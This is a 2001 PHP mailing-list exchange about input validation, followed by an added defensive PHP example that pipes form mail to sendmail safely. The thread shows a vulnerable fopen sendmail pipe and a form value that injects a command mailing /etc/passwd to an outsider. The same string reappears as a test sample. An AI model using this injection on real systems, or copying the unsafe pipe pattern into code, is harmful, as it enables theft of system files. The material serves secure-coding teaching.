> At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote:
> > > I've done something similar in the past just for kicks, and I got the same
> > > result you did (i.e. an error). I believe this is because mysql_query()
> > > expects ONE query at a time and will break if you send two or more. I
> > > could be completely and totally wrong about that, though (someone please
> > > correct me if I am)...
> > >
> >Maybe this one failed, but it's always a good idea to check user input.
> >Let's say you're emailing a form and you don't use the mail() function,
> >but make a call directly to sendmail... and you're sloppy... so you do
> >this:
> [...]
>
> True. But we were speaking specifically about MySQL. When you start
> toying with external programs and exec() and so forth then you've opened up
> a whole other can of worms security-wise...

True, but why take the chance? :) I didn't see an equivalent for MySQL, but
PostgreSQL has a pg_put_line() which just sends a NULL terminated string to
the backend so you can do whatever you want (i.e. multi statement). So in
that case things could get messed up.

>
> >$fp = fopen("|/usr/bin/sendmail $sendto");
> >#write stuff to pipe to send email...
> >
> >Now... what if when I filled out the form I set $sendto equal to this:
> >
> >[EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] < /etc/passwd
>
> A definite possibility, but it does depend on the hacker in question
> knowing exactly how your script is written...

True, but in a shared hosting environment this is very likely.

-philip

--
PHP General Mailing List (http://www.php.net/)
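
Added example (not part of the thread and not the posters' code): one way to pipe form mail to sendmail so that the `$sendto` value discussed above never reaches a shell or the command line. It assumes PHP 7.4 or later for the array form of proc_open(); the function names and the sample inputs are constructed for illustration.

```php
<?php
// Added example, not code from the thread. Function names are hypothetical.

// Return a validated address, or null if the form value is unusable.
function clean_recipient(string $input): ?string
{
    $input = trim($input);
    // Any control character (CR/LF included) could start a new header line.
    if (preg_match('/[\x00-\x1F\x7F]/', $input)) {
        return null;
    }
    $addr = filter_var($input, FILTER_VALIDATE_EMAIL);
    return $addr === false ? null : $addr;
}

// Pipe a message to sendmail without a shell and without user data in argv.
function send_form_mail(string $sendto, string $subject, string $body): bool
{
    $to = clean_recipient($sendto);
    if ($to === null || preg_match('/[\r\n]/', $subject)) {
        return false;
    }
    // Array form (PHP >= 7.4) executes the binary directly; no shell parses it.
    // -t: take recipients from the headers, -i: a lone "." does not end input.
    $cmd = ['/usr/bin/sendmail', '-t', '-i'];
    $proc = proc_open($cmd, [0 => ['pipe', 'r']], $pipes);
    if (!is_resource($proc)) {
        return false;
    }
    fwrite($pipes[0], "To: $to\nSubject: $subject\n\n$body\n");
    fclose($pipes[0]);
    return proc_close($proc) === 0;
}

// Constructed sample inputs; the second follows the shape quoted in the thread.
$samples = [
    'user@example.com',
    'user@example.com; /usr/bin/mail other@example.net < /etc/passwd',
    "user@example.com\r\nBcc: other@example.net",
    'o`id`@example.com', // valid e-mail syntax, yet unsafe inside a shell string
];
foreach ($samples as $s) {
    $verdict = clean_recipient($s) === null ? 'rejected' : 'accepted';
    printf("%-68s => %s\n", json_encode($s), $verdict);
}
```

The last sample is why validation alone is not the fix: an address can be syntactically valid and still carry shell metacharacters, so the command itself has to stay free of user input.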